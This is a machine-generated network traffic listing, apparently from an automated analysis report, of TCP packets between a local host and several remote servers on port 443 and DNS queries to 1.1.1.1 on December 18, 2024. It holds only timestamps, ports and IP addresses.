                                                                                                                                                                                                              Dec 18, 2024 09:58:37.602606058 CET49712443192.168.2.8178.62.201.34
                                                                                                                                                                                                              Dec 18, 2024 09:58:37.602771044 CET44349712178.62.201.34192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:38.131524086 CET44349712178.62.201.34192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:38.131618023 CET44349712178.62.201.34192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:38.131695032 CET49712443192.168.2.8178.62.201.34
                                                                                                                                                                                                              Dec 18, 2024 09:58:38.133796930 CET49712443192.168.2.8178.62.201.34
                                                                                                                                                                                                              Dec 18, 2024 09:58:38.133827925 CET44349712178.62.201.34192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:38.133846998 CET49712443192.168.2.8178.62.201.34
                                                                                                                                                                                                              Dec 18, 2024 09:58:38.133855104 CET44349712178.62.201.34192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:39.412523031 CET49713443192.168.2.845.77.249.79
                                                                                                                                                                                                              Dec 18, 2024 09:58:39.412626028 CET4434971345.77.249.79192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:39.412738085 CET49713443192.168.2.845.77.249.79
                                                                                                                                                                                                              Dec 18, 2024 09:58:39.413091898 CET49713443192.168.2.845.77.249.79
                                                                                                                                                                                                              Dec 18, 2024 09:58:39.413124084 CET4434971345.77.249.79192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:41.328022003 CET4434971345.77.249.79192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:41.328109980 CET49713443192.168.2.845.77.249.79
                                                                                                                                                                                                              Dec 18, 2024 09:58:41.432040930 CET49713443192.168.2.845.77.249.79
                                                                                                                                                                                                              Dec 18, 2024 09:58:41.432096004 CET4434971345.77.249.79192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:41.433099031 CET4434971345.77.249.79192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:41.455795050 CET49713443192.168.2.845.77.249.79
                                                                                                                                                                                                              Dec 18, 2024 09:58:41.455827951 CET49713443192.168.2.845.77.249.79
                                                                                                                                                                                                              Dec 18, 2024 09:58:41.455988884 CET4434971345.77.249.79192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:42.516841888 CET4434971345.77.249.79192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:42.517055988 CET4434971345.77.249.79192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:42.517182112 CET49713443192.168.2.845.77.249.79
                                                                                                                                                                                                              Dec 18, 2024 09:58:42.517182112 CET49713443192.168.2.845.77.249.79
                                                                                                                                                                                                              Dec 18, 2024 09:58:42.517182112 CET49713443192.168.2.845.77.249.79
                                                                                                                                                                                                              Dec 18, 2024 09:58:42.517275095 CET4434971345.77.249.79192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:42.744412899 CET49713443192.168.2.845.77.249.79
                                                                                                                                                                                                              Dec 18, 2024 09:58:42.744479895 CET4434971345.77.249.79192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:44.213092089 CET49714443192.168.2.823.55.153.106
                                                                                                                                                                                                              Dec 18, 2024 09:58:44.213146925 CET4434971423.55.153.106192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:44.213228941 CET49714443192.168.2.823.55.153.106
                                                                                                                                                                                                              Dec 18, 2024 09:58:44.213671923 CET49714443192.168.2.823.55.153.106
                                                                                                                                                                                                              Dec 18, 2024 09:58:44.213690996 CET4434971423.55.153.106192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:45.602896929 CET4434971423.55.153.106192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:45.603018999 CET49714443192.168.2.823.55.153.106
                                                                                                                                                                                                              Dec 18, 2024 09:58:45.604775906 CET49714443192.168.2.823.55.153.106
                                                                                                                                                                                                              Dec 18, 2024 09:58:45.604787111 CET4434971423.55.153.106192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:45.605189085 CET4434971423.55.153.106192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:45.606432915 CET49714443192.168.2.823.55.153.106
                                                                                                                                                                                                              Dec 18, 2024 09:58:45.647329092 CET4434971423.55.153.106192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:46.363806009 CET4434971423.55.153.106192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:46.363887072 CET4434971423.55.153.106192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:46.363929987 CET4434971423.55.153.106192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:46.364068985 CET49714443192.168.2.823.55.153.106
                                                                                                                                                                                                              Dec 18, 2024 09:58:46.364137888 CET4434971423.55.153.106192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:46.364178896 CET49714443192.168.2.823.55.153.106
                                                                                                                                                                                                              Dec 18, 2024 09:58:46.364198923 CET49714443192.168.2.823.55.153.106
                                                                                                                                                                                                              Dec 18, 2024 09:58:46.540576935 CET4434971423.55.153.106192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:46.540635109 CET4434971423.55.153.106192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:46.540699005 CET49714443192.168.2.823.55.153.106
                                                                                                                                                                                                              Dec 18, 2024 09:58:46.540762901 CET4434971423.55.153.106192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:46.540810108 CET49714443192.168.2.823.55.153.106
                                                                                                                                                                                                              Dec 18, 2024 09:58:46.582823038 CET4434971423.55.153.106192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:46.582880974 CET4434971423.55.153.106192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:46.583014965 CET4434971423.55.153.106192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:46.583015919 CET49714443192.168.2.823.55.153.106
                                                                                                                                                                                                              Dec 18, 2024 09:58:46.583085060 CET49714443192.168.2.823.55.153.106
                                                                                                                                                                                                              Dec 18, 2024 09:58:46.584208012 CET49714443192.168.2.823.55.153.106
                                                                                                                                                                                                              Dec 18, 2024 09:58:46.584208012 CET49714443192.168.2.823.55.153.106
                                                                                                                                                                                                              Dec 18, 2024 09:58:46.584252119 CET4434971423.55.153.106192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:46.584280968 CET4434971423.55.153.106192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:46.731173992 CET49715443192.168.2.8104.21.66.86
                                                                                                                                                                                                              Dec 18, 2024 09:58:46.731210947 CET44349715104.21.66.86192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:46.731287003 CET49715443192.168.2.8104.21.66.86
                                                                                                                                                                                                              Dec 18, 2024 09:58:46.731730938 CET49715443192.168.2.8104.21.66.86
                                                                                                                                                                                                              Dec 18, 2024 09:58:46.731744051 CET44349715104.21.66.86192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:47.956490040 CET44349715104.21.66.86192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:47.956559896 CET49715443192.168.2.8104.21.66.86
                                                                                                                                                                                                              Dec 18, 2024 09:58:47.958035946 CET49715443192.168.2.8104.21.66.86
                                                                                                                                                                                                              Dec 18, 2024 09:58:47.958043098 CET44349715104.21.66.86192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:47.958445072 CET44349715104.21.66.86192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:47.959520102 CET49715443192.168.2.8104.21.66.86
                                                                                                                                                                                                              Dec 18, 2024 09:58:47.959559917 CET49715443192.168.2.8104.21.66.86
                                                                                                                                                                                                              Dec 18, 2024 09:58:47.959609985 CET44349715104.21.66.86192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:49.061233044 CET44349715104.21.66.86192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:49.061481953 CET44349715104.21.66.86192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:49.061547995 CET49715443192.168.2.8104.21.66.86
                                                                                                                                                                                                              Dec 18, 2024 09:58:49.062160969 CET49715443192.168.2.8104.21.66.86
                                                                                                                                                                                                              Dec 18, 2024 09:58:49.062176943 CET44349715104.21.66.86192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:49.257061958 CET49716443192.168.2.8104.21.66.86
                                                                                                                                                                                                              Dec 18, 2024 09:58:49.257155895 CET44349716104.21.66.86192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:49.257294893 CET49716443192.168.2.8104.21.66.86
                                                                                                                                                                                                              Dec 18, 2024 09:58:49.257859945 CET49716443192.168.2.8104.21.66.86
                                                                                                                                                                                                              Dec 18, 2024 09:58:49.257899046 CET44349716104.21.66.86192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:50.484922886 CET44349716104.21.66.86192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:50.485048056 CET49716443192.168.2.8104.21.66.86
                                                                                                                                                                                                              Dec 18, 2024 09:58:50.486192942 CET49716443192.168.2.8104.21.66.86
                                                                                                                                                                                                              Dec 18, 2024 09:58:50.486223936 CET44349716104.21.66.86192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:50.487154007 CET44349716104.21.66.86192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:50.488178968 CET49716443192.168.2.8104.21.66.86
                                                                                                                                                                                                              Dec 18, 2024 09:58:50.488229036 CET49716443192.168.2.8104.21.66.86
                                                                                                                                                                                                              Dec 18, 2024 09:58:50.488408089 CET44349716104.21.66.86192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:51.308229923 CET44349716104.21.66.86192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:51.308341980 CET44349716104.21.66.86192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:51.308409929 CET49716443192.168.2.8104.21.66.86
                                                                                                                                                                                                              Dec 18, 2024 09:58:51.308439970 CET44349716104.21.66.86192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:51.308734894 CET44349716104.21.66.86192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:51.308789015 CET44349716104.21.66.86192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:51.308789968 CET49716443192.168.2.8104.21.66.86
                                                                                                                                                                                                              Dec 18, 2024 09:58:51.308805943 CET44349716104.21.66.86192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:51.308841944 CET49716443192.168.2.8104.21.66.86
                                                                                                                                                                                                              Dec 18, 2024 09:58:51.316639900 CET44349716104.21.66.86192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:51.325241089 CET44349716104.21.66.86192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:51.325310946 CET49716443192.168.2.8104.21.66.86
                                                                                                                                                                                                              Dec 18, 2024 09:58:51.325347900 CET44349716104.21.66.86192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:51.369471073 CET49716443192.168.2.8104.21.66.86
                                                                                                                                                                                                              Dec 18, 2024 09:58:51.369514942 CET44349716104.21.66.86192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:51.416292906 CET49716443192.168.2.8104.21.66.86
                                                                                                                                                                                                              Dec 18, 2024 09:58:51.449991941 CET44349716104.21.66.86192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:51.494429111 CET49716443192.168.2.8104.21.66.86
                                                                                                                                                                                                              Dec 18, 2024 09:58:51.494477034 CET44349716104.21.66.86192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:51.541306019 CET49716443192.168.2.8104.21.66.86
                                                                                                                                                                                                              Dec 18, 2024 09:58:51.541352034 CET44349716104.21.66.86192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:51.569581985 CET44349716104.21.66.86192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:51.569812059 CET44349716104.21.66.86192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:51.569962025 CET49716443192.168.2.8104.21.66.86
                                                                                                                                                                                                              Dec 18, 2024 09:58:51.570022106 CET49716443192.168.2.8104.21.66.86
                                                                                                                                                                                                              Dec 18, 2024 09:58:51.570060968 CET44349716104.21.66.86192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:51.570091963 CET49716443192.168.2.8104.21.66.86
                                                                                                                                                                                                              Dec 18, 2024 09:58:51.570106030 CET44349716104.21.66.86192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:52.305361032 CET49717443192.168.2.8104.21.66.86
                                                                                                                                                                                                              Dec 18, 2024 09:58:52.305404902 CET44349717104.21.66.86192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:52.305490971 CET49717443192.168.2.8104.21.66.86
                                                                                                                                                                                                              Dec 18, 2024 09:58:52.305783033 CET49717443192.168.2.8104.21.66.86
                                                                                                                                                                                                              Dec 18, 2024 09:58:52.305795908 CET44349717104.21.66.86192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:53.515053034 CET44349717104.21.66.86192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:53.515161991 CET49717443192.168.2.8104.21.66.86
                                                                                                                                                                                                              Dec 18, 2024 09:58:53.516355991 CET49717443192.168.2.8104.21.66.86
                                                                                                                                                                                                              Dec 18, 2024 09:58:53.516383886 CET44349717104.21.66.86192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:53.516738892 CET44349717104.21.66.86192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:53.518085003 CET49717443192.168.2.8104.21.66.86
                                                                                                                                                                                                              Dec 18, 2024 09:58:53.518205881 CET49717443192.168.2.8104.21.66.86
                                                                                                                                                                                                              Dec 18, 2024 09:58:53.518240929 CET44349717104.21.66.86192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:54.433700085 CET44349717104.21.66.86192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:54.433924913 CET44349717104.21.66.86192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:54.436970949 CET49717443192.168.2.8104.21.66.86
                                                                                                                                                                                                              Dec 18, 2024 09:58:54.437166929 CET49717443192.168.2.8104.21.66.86
                                                                                                                                                                                                              Dec 18, 2024 09:58:54.437191963 CET44349717104.21.66.86192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:54.649759054 CET49718443192.168.2.8104.21.66.86
                                                                                                                                                                                                              Dec 18, 2024 09:58:54.649863005 CET44349718104.21.66.86192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:54.649951935 CET49718443192.168.2.8104.21.66.86
                                                                                                                                                                                                              Dec 18, 2024 09:58:54.650269032 CET49718443192.168.2.8104.21.66.86
                                                                                                                                                                                                              Dec 18, 2024 09:58:54.650306940 CET44349718104.21.66.86192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:55.867820978 CET44349718104.21.66.86192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:55.867927074 CET49718443192.168.2.8104.21.66.86
                                                                                                                                                                                                              Dec 18, 2024 09:58:55.869142056 CET49718443192.168.2.8104.21.66.86
                                                                                                                                                                                                              Dec 18, 2024 09:58:55.869160891 CET44349718104.21.66.86192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:55.869573116 CET44349718104.21.66.86192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:55.870863914 CET49718443192.168.2.8104.21.66.86
                                                                                                                                                                                                              Dec 18, 2024 09:58:55.871007919 CET49718443192.168.2.8104.21.66.86
                                                                                                                                                                                                              Dec 18, 2024 09:58:55.871052027 CET44349718104.21.66.86192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:55.871171951 CET49718443192.168.2.8104.21.66.86
                                                                                                                                                                                                              Dec 18, 2024 09:58:55.915332079 CET44349718104.21.66.86192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:57.738023043 CET44349718104.21.66.86192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:57.738280058 CET44349718104.21.66.86192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:57.738384008 CET49718443192.168.2.8104.21.66.86
                                                                                                                                                                                                              Dec 18, 2024 09:58:57.741945028 CET49718443192.168.2.8104.21.66.86
                                                                                                                                                                                                              Dec 18, 2024 09:58:57.741982937 CET44349718104.21.66.86192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:58.064681053 CET49719443192.168.2.8104.21.66.86
                                                                                                                                                                                                              Dec 18, 2024 09:58:58.064774990 CET44349719104.21.66.86192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:58.064855099 CET49719443192.168.2.8104.21.66.86
                                                                                                                                                                                                              Dec 18, 2024 09:58:58.065381050 CET49719443192.168.2.8104.21.66.86
                                                                                                                                                                                                              Dec 18, 2024 09:58:58.065414906 CET44349719104.21.66.86192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:59.279557943 CET44349719104.21.66.86192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:59.279633045 CET49719443192.168.2.8104.21.66.86
                                                                                                                                                                                                              Dec 18, 2024 09:58:59.280900002 CET49719443192.168.2.8104.21.66.86
                                                                                                                                                                                                              Dec 18, 2024 09:58:59.280911922 CET44349719104.21.66.86192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:59.281244040 CET44349719104.21.66.86192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:59.282351017 CET49719443192.168.2.8104.21.66.86
                                                                                                                                                                                                              Dec 18, 2024 09:58:59.282465935 CET49719443192.168.2.8104.21.66.86
                                                                                                                                                                                                              Dec 18, 2024 09:58:59.282499075 CET44349719104.21.66.86192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:59.282562017 CET49719443192.168.2.8104.21.66.86
                                                                                                                                                                                                              Dec 18, 2024 09:58:59.282571077 CET44349719104.21.66.86192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:59:01.113260984 CET44349719104.21.66.86192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:59:01.113504887 CET44349719104.21.66.86192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:59:01.113539934 CET49719443192.168.2.8104.21.66.86
                                                                                                                                                                                                              Dec 18, 2024 09:59:01.113642931 CET49719443192.168.2.8104.21.66.86
                                                                                                                                                                                                              Dec 18, 2024 09:59:01.524213076 CET49720443192.168.2.8104.21.66.86
                                                                                                                                                                                                              Dec 18, 2024 09:59:01.524259090 CET44349720104.21.66.86192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:59:01.524334908 CET49720443192.168.2.8104.21.66.86
                                                                                                                                                                                                              Dec 18, 2024 09:59:01.524667978 CET49720443192.168.2.8104.21.66.86
                                                                                                                                                                                                              Dec 18, 2024 09:59:01.524682045 CET44349720104.21.66.86192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:59:02.733119965 CET44349720104.21.66.86192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:59:02.733201027 CET49720443192.168.2.8104.21.66.86
                                                                                                                                                                                                              Dec 18, 2024 09:59:02.734553099 CET49720443192.168.2.8104.21.66.86
                                                                                                                                                                                                              Dec 18, 2024 09:59:02.734564066 CET44349720104.21.66.86192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:59:02.734889984 CET44349720104.21.66.86192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:59:02.736077070 CET49720443192.168.2.8104.21.66.86
                                                                                                                                                                                                              Dec 18, 2024 09:59:02.736162901 CET49720443192.168.2.8104.21.66.86
                                                                                                                                                                                                              Dec 18, 2024 09:59:02.736167908 CET44349720104.21.66.86192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:59:03.594398975 CET44349720104.21.66.86192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:59:03.594687939 CET44349720104.21.66.86192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:59:03.594758987 CET49720443192.168.2.8104.21.66.86
                                                                                                                                                                                                              Dec 18, 2024 09:59:03.597136974 CET49720443192.168.2.8104.21.66.86
                                                                                                                                                                                                              Dec 18, 2024 09:59:03.597151041 CET44349720104.21.66.86192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:59:04.069462061 CET49721443192.168.2.8104.21.66.86
                                                                                                                                                                                                              Dec 18, 2024 09:59:04.069519997 CET44349721104.21.66.86192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:59:04.069597960 CET49721443192.168.2.8104.21.66.86
                                                                                                                                                                                                              Dec 18, 2024 09:59:04.069936991 CET49721443192.168.2.8104.21.66.86
                                                                                                                                                                                                              Dec 18, 2024 09:59:04.069957018 CET44349721104.21.66.86192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:59:05.286698103 CET44349721104.21.66.86192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:59:05.287292957 CET49721443192.168.2.8104.21.66.86
                                                                                                                                                                                                              Dec 18, 2024 09:59:05.291327000 CET49721443192.168.2.8104.21.66.86
                                                                                                                                                                                                              Dec 18, 2024 09:59:05.291356087 CET44349721104.21.66.86192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:59:05.291757107 CET44349721104.21.66.86192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:59:05.339282036 CET49721443192.168.2.8104.21.66.86
                                                                                                                                                                                                              Dec 18, 2024 09:59:05.395358086 CET49721443192.168.2.8104.21.66.86
                                                                                                                                                                                                              Dec 18, 2024 09:59:05.396779060 CET49721443192.168.2.8104.21.66.86
                                                                                                                                                                                                              Dec 18, 2024 09:59:05.396862984 CET44349721104.21.66.86192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:59:05.397623062 CET49721443192.168.2.8104.21.66.86
                                                                                                                                                                                                              Dec 18, 2024 09:59:05.397686005 CET44349721104.21.66.86192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:59:05.398015022 CET49721443192.168.2.8104.21.66.86
                                                                                                                                                                                                              Dec 18, 2024 09:59:05.398055077 CET44349721104.21.66.86192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:59:05.398355007 CET49721443192.168.2.8104.21.66.86
                                                                                                                                                                                                              Dec 18, 2024 09:59:05.398399115 CET44349721104.21.66.86192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:59:05.398597002 CET49721443192.168.2.8104.21.66.86
                                                                                                                                                                                                              Dec 18, 2024 09:59:05.398652077 CET44349721104.21.66.86192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:59:05.399099112 CET49721443192.168.2.8104.21.66.86
                                                                                                                                                                                                              Dec 18, 2024 09:59:05.399141073 CET44349721104.21.66.86192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:59:05.399158955 CET49721443192.168.2.8104.21.66.86
                                                                                                                                                                                                              Dec 18, 2024 09:59:05.399177074 CET44349721104.21.66.86192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:59:05.399710894 CET49721443192.168.2.8104.21.66.86
                                                                                                                                                                                                              Dec 18, 2024 09:59:05.399751902 CET44349721104.21.66.86192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:59:05.399785995 CET49721443192.168.2.8104.21.66.86
                                                                                                                                                                                                              Dec 18, 2024 09:59:05.399929047 CET49721443192.168.2.8104.21.66.86
                                                                                                                                                                                                              Dec 18, 2024 09:59:05.399981022 CET49721443192.168.2.8104.21.66.86
                                                                                                                                                                                                              Dec 18, 2024 09:59:05.447350025 CET44349721104.21.66.86192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:59:05.447725058 CET49721443192.168.2.8104.21.66.86
                                                                                                                                                                                                              Dec 18, 2024 09:59:05.447788954 CET49721443192.168.2.8104.21.66.86
                                                                                                                                                                                                              Dec 18, 2024 09:59:05.447841883 CET49721443192.168.2.8104.21.66.86
                                                                                                                                                                                                              Dec 18, 2024 09:59:05.495343924 CET44349721104.21.66.86192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:59:05.495707989 CET49721443192.168.2.8104.21.66.86
                                                                                                                                                                                                              Dec 18, 2024 09:59:05.525696993 CET49721443192.168.2.8104.21.66.86
                                                                                                                                                                                                              Dec 18, 2024 09:59:05.525724888 CET44349721104.21.66.86192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:59:07.871391058 CET44349721104.21.66.86192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:59:07.871515989 CET44349721104.21.66.86192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:59:07.871583939 CET49721443192.168.2.8104.21.66.86
                                                                                                                                                                                                              Dec 18, 2024 09:59:07.871751070 CET49721443192.168.2.8104.21.66.86
                                                                                                                                                                                                              Dec 18, 2024 09:59:07.871786118 CET44349721104.21.66.86192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:59:07.881903887 CET49722443192.168.2.8104.21.66.86
                                                                                                                                                                                                              Dec 18, 2024 09:59:07.881951094 CET44349722104.21.66.86192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:59:07.882020950 CET49722443192.168.2.8104.21.66.86
                                                                                                                                                                                                              Dec 18, 2024 09:59:07.882319927 CET49722443192.168.2.8104.21.66.86
                                                                                                                                                                                                              Dec 18, 2024 09:59:07.882338047 CET44349722104.21.66.86192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:59:09.100825071 CET44349722104.21.66.86192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:59:09.101015091 CET49722443192.168.2.8104.21.66.86
                                                                                                                                                                                                              Dec 18, 2024 09:59:09.102165937 CET49722443192.168.2.8104.21.66.86
                                                                                                                                                                                                              Dec 18, 2024 09:59:09.102171898 CET44349722104.21.66.86192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:59:09.102576017 CET44349722104.21.66.86192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:59:09.103631973 CET49722443192.168.2.8104.21.66.86
                                                                                                                                                                                                              Dec 18, 2024 09:59:09.103646994 CET49722443192.168.2.8104.21.66.86
                                                                                                                                                                                                              Dec 18, 2024 09:59:09.103720903 CET44349722104.21.66.86192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:59:09.910846949 CET44349722104.21.66.86192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:59:09.910976887 CET44349722104.21.66.86192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:59:09.911041021 CET49722443192.168.2.8104.21.66.86
                                                                                                                                                                                                              Dec 18, 2024 09:59:09.911261082 CET49722443192.168.2.8104.21.66.86
                                                                                                                                                                                                              Dec 18, 2024 09:59:09.911274910 CET44349722104.21.66.86192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:59:09.911303997 CET49722443192.168.2.8104.21.66.86
                                                                                                                                                                                                              Dec 18, 2024 09:59:09.911309958 CET44349722104.21.66.86192.168.2.8

                                                                                                                                                                                                              UDP Packets

                                                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                              Dec 18, 2024 09:58:34.137711048 CET5995953192.168.2.81.1.1.1
                                                                                                                                                                                                              Dec 18, 2024 09:58:34.459342957 CET53599591.1.1.1192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:34.461277008 CET5279553192.168.2.81.1.1.1
                                                                                                                                                                                                              Dec 18, 2024 09:58:35.448316097 CET5279553192.168.2.81.1.1.1
                                                                                                                                                                                                              Dec 18, 2024 09:58:35.748353958 CET53527951.1.1.1192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:35.748372078 CET53527951.1.1.1192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:38.138128996 CET5457653192.168.2.81.1.1.1
                                                                                                                                                                                                              Dec 18, 2024 09:58:39.135252953 CET5457653192.168.2.81.1.1.1
                                                                                                                                                                                                              Dec 18, 2024 09:58:39.411386967 CET53545761.1.1.1192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:39.411403894 CET53545761.1.1.1192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:42.536330938 CET6532553192.168.2.81.1.1.1
                                                                                                                                                                                                              Dec 18, 2024 09:58:42.844500065 CET53653251.1.1.1192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:42.847702980 CET5292253192.168.2.81.1.1.1
                                                                                                                                                                                                              Dec 18, 2024 09:58:43.071993113 CET53529221.1.1.1192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:43.075720072 CET5855753192.168.2.81.1.1.1
                                                                                                                                                                                                              Dec 18, 2024 09:58:43.377454042 CET53585571.1.1.1192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:43.381328106 CET5628453192.168.2.81.1.1.1
                                                                                                                                                                                                              Dec 18, 2024 09:58:43.606302977 CET53562841.1.1.1192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:43.610497952 CET5829953192.168.2.81.1.1.1
                                                                                                                                                                                                              Dec 18, 2024 09:58:43.842202902 CET53582991.1.1.1192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:43.846754074 CET5929653192.168.2.81.1.1.1
